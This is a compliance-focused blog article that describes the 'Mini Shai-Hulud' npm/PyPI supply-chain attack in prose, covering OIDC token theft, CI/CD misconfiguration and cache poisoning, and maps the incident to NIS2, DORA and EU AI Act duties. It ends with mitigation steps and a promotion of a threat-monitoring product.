Mini Shai-Hulud: How OIDC Token Hijacking Threatens NIS2, DORA, and EU AI Act Compliance

Introduction: A New Breed of Supply Chain Attack

In early 2025, the software supply chain was rocked by the Mini Shai-Hulud attack—a sophisticated campaign that compromised over 170 packages across NPM and PyPI. Targeting high-profile projects including TanStack, Mistral AI, UiPath, Guardrails AI, and OpenSearch, the attack exploited critical vulnerabilities in CI/CD pipelines, including pull_request_target misconfiguration, GitHub Actions cache poisoning, and—most alarmingly—OIDC token extraction from runner memory.

Attributed to the threat group TeamPCP, the attackers used stolen OpenID Connect (OIDC) tokens to publish malicious package versions that carried valid SLSA Build Level 3 provenance. This made the compromised packages appear cryptographically authentic, bypassing traditional supply-chain verification. The malware steals credentials, API keys, tokens, and secrets, exfiltrating data via a decentralized Session network and persisting through Claude Code hooks and VS Code auto-run tasks.

This incident is more than a technical breach—it is a compliance watershed. For organizations subject to NIS2, DORA, or the EU AI Act, the Mini Shai-Hulud attack underscores urgent supply chain security obligations. Below, we dissect the attack vector and map its implications to each regulatory framework.

Attack Vector Deep Dive: OIDC Token Hijacking and CI/CD Exploitation

The Mini Shai-Hulud attack chain involved three interconnected vulnerabilities:

1. Pull_request_target misconfiguration: The attackers exploited GitHub Actions workflows that use the pull_request_target event without proper sandboxing. This allowed malicious PRs to run with repository-level write permissions.
2. GitHub Actions cache poisoning: By poisoning the cache, attackers could inject malicious artifacts into the build pipeline.
3. OIDC token extraction: The most critical step—attackers extracted OIDC tokens from runner memory, enabling them to authenticate as the legitimate project and publish packages with valid provenance.

Once inside, the malware exfiltrated credentials, API keys, tokens, and secrets via multiple channels, including the Session P2P network and GitHub repositories. It also propagated by using compromised tokens to publish malicious versions. Over 400 package artifacts were compromised across NPM and PyPI. Notably, the malware employed geofencing logic to avoid execution on Russian-language systems and included a destructive wipe routine targeting Israel/Iran with a 1-in-6 probability.

This attack demonstrates how OIDC token hijacking can bypass SLSA provenance verification, making malicious packages appear authentic. For compliance teams, the lesson is clear: provenance alone is not enough. Behavioral analysis at install time and continuous monitoring of CI/CD pipelines are essential.

NIS2 Compliance: Supply Chain Security and Incident Reporting

The NIS2 Directive (EU 2022/2555) applies to essential and important entities across 18 sectors, including digital infrastructure and ICT service management. Member states had until 17 October 2024 to transpose the directive into national law. NIS2 places explicit requirements on supply chain security:

• Risk management measures: Entities must implement measures to manage risks in their supply chains, including security in software development and procurement.
• Incident reporting: Entities must report significant incidents within 24 hours (early warning) and 72 hours (full notification).
• Management accountability: Company boards can be held personally liable for cybersecurity failures.

The Mini Shai-Hulud attack directly implicates NIS2 supply chain obligations. Organizations using compromised packages (e.g., TanStack, Mistral AI) may have unknowingly introduced vulnerabilities into their systems. Under NIS2, they would be required to:

• Conduct supply chain risk assessments for all third-party software components.
• Maintain a Software Bill of Materials (SBOM) to track dependencies and identify compromised packages.
• Report the incident to the relevant national authority if it meets the threshold for significant impact.

For US readers, NIS2 has parallels with CMMC 2.0 (for defense contractors) and CISA's CIRCIA (which requires critical infrastructure entities to report cyber incidents within 72 hours). Both frameworks emphasize supply chain security and incident reporting.

DORA Compliance: ICT Third-Party Risk Management

The Digital Operational Resilience Act (DORA) (EU 2022/2554) applies to financial entities—banks, insurers, investment firms, payment institutions, and crypto-asset service providers—from 17 January 2025. DORA mandates:

• ICT risk management framework: Comprehensive policies for managing ICT risks, including those arising from third-party providers.
• Third-party risk management: Financial entities must assess and monitor the security of ICT third-party service providers, including software vendors and open-source dependencies.
• Digital operational resilience testing: Regular testing, including threat-led penetration testing for designated entities.
• Incident reporting: Major ICT-related incidents must be reported to competent authorities.

The Mini Shai-Hulud attack is a textbook example of a third-party ICT risk that DORA aims to mitigate. A financial institution using a compromised package like Mistral AI's SDK could face operational disruption, data breaches, and regulatory penalties. Under DORA, compliance teams must:

• Map all ICT third parties and their sub-contractors, including open-source dependencies.
• Require SBOMs and provenance verification from software vendors.
• Implement continuous monitoring of third-party risk, including scanning for known vulnerabilities and malicious packages.
• Conduct digital operational resilience testing that includes scenarios involving supply chain compromises.

DORA's focus on ICT third-party risk management is echoed in the US by the SEC's cybersecurity disclosure rules (which require public companies to disclose material cybersecurity incidents within 4 business days) and the FedRAMP Authorization Act (which mandates security assessments for cloud products used by federal agencies).

EU AI Act: Secure Development Obligations for AI Providers

The EU AI Act (Regulation (EU) 2024/1689) entered into force on 1 August 2024, with phased applicability. For AI systems classified as high-risk (including those used in employment, education, and critical infrastructure), providers must comply with strict requirements. Among them:

• Risk management system: A continuous, iterative process throughout the AI system's lifecycle.
• Data governance: Training, validation, and testing data must be relevant, representative, and free from biases.
• Technical documentation: Including a detailed description of the development process and system architecture.
• Transparency and provision of information: Users must be informed that they are interacting with an AI system.
• Human oversight: Measures to ensure human oversight of the AI system's operation.
• Accuracy, robustness, and cybersecurity: AI systems must be resilient to attempts by unauthorized third parties to alter their use or performance.

The Mini Shai-Hulud attack directly threatens the cybersecurity and robustness requirements of the EU AI Act. For example, Mistral AI—a targeted project—develops large language models that may be used in high-risk applications. If its SDK was compromised, downstream AI systems could be exposed to backdoors or data exfiltration. Under the AI Act, providers must:

• Ensure secure software development practices, including supply chain security measures.
• Maintain SBOMs for all dependencies used in AI systems.
• Implement continuous monitoring for vulnerabilities and threats in the supply chain.
• Report incidents that affect the security or performance of high-risk AI systems.

The AI Act also requires AI literacy (Article 4) from 2 February 2025, meaning organizations must ensure that staff involved in AI development and deployment understand the risks, including supply chain risks. For guidance on AI Act compliance, see our EU AI Act Compliance Roadmap.

Actionable Steps for Compliance Teams

The Mini Shai-Hulud attack is a wake-up call for compliance teams. Here are concrete steps to mitigate similar risks:

1. Implement Software Bill of Materials (SBOM): Maintain an SBOM for all software components, including open-source dependencies. Use tools to automatically generate and update SBOMs in your CI/CD pipeline.
2. Enforce code signing: Ensure that all deployed code is digitally signed. Verify signatures before execution to prevent tampered packages from running.
3. Adopt continuous monitoring: Use tools that monitor your software supply chain for known vulnerabilities, malicious packages, and anomalous behavior. Platforms like AIGovHub's SENTINEL module provide real-time threat monitoring across 435+ intelligence sources, including CISA and OFAC, and can help detect supply chain risks early.
4. Harden CI/CD pipelines: Review GitHub Actions workflows for risky configurations (e.g., pull_request_target). Use least-privilege permissions for OIDC tokens and implement cache isolation.
5. Rotate credentials and audit secrets: Immediately rotate all credentials that may have been exposed. Use secret scanning tools to detect leaked secrets in code repositories.
6. Conduct vendor risk assessments: For each third-party software component, assess the vendor's security practices. Require SBOMs and provenance attestations (e.g., SLSA levels) as part of procurement.
7. Align with regulatory frameworks: Map your supply chain security program to NIS2, DORA, and EU AI Act requirements. Use the EU AI Act Compliance Roadmap to identify gaps.

Key Takeaways

• The Mini Shai-Hulud attack exploited OIDC token hijacking to compromise over 170 packages on NPM and PyPI, targeting major projects like TanStack, Mistral AI, and UiPath.
• Attackers bypassed SLSA provenance verification by using stolen OIDC tokens to publish malicious packages with valid provenance.
• NIS2 requires entities to manage supply chain risks and report incidents; the attack directly implicates these obligations.
• DORA mandates ICT third-party risk management for financial entities, including monitoring of open-source dependencies.
• The EU AI Act requires providers of high-risk AI systems to ensure cybersecurity and robustness, including secure supply chain practices.
• Compliance teams should implement SBOMs, code signing, continuous monitoring, and CI/CD hardening to mitigate similar risks.

Conclusion: Strengthen Your Supply Chain Compliance

The Mini Shai-Hulud attack demonstrates that traditional software supply chain security measures—like provenance verification—are no longer sufficient. Regulators are taking notice. NIS2, DORA, and the EU AI Act all impose explicit supply chain security obligations that organizations must address proactively.

To stay ahead of these threats, compliance teams need real-time visibility into their software supply chain. AIGovHub's SENTINEL module provides AI-native geopolitical and supply chain risk intelligence, monitoring 435+ sources—including OFAC, CISA, and global news—to detect emerging threats before they impact your organization. With features like financial crime screening across 27+ sanctions lists, supply chain risk monitoring for 6 strategic shipping routes, and a Global Crisis Index for 200+ countries, SENTINEL helps you meet NIS2, DORA, and AI Act requirements with confidence.

This content is for informational purposes only and does not constitute legal advice.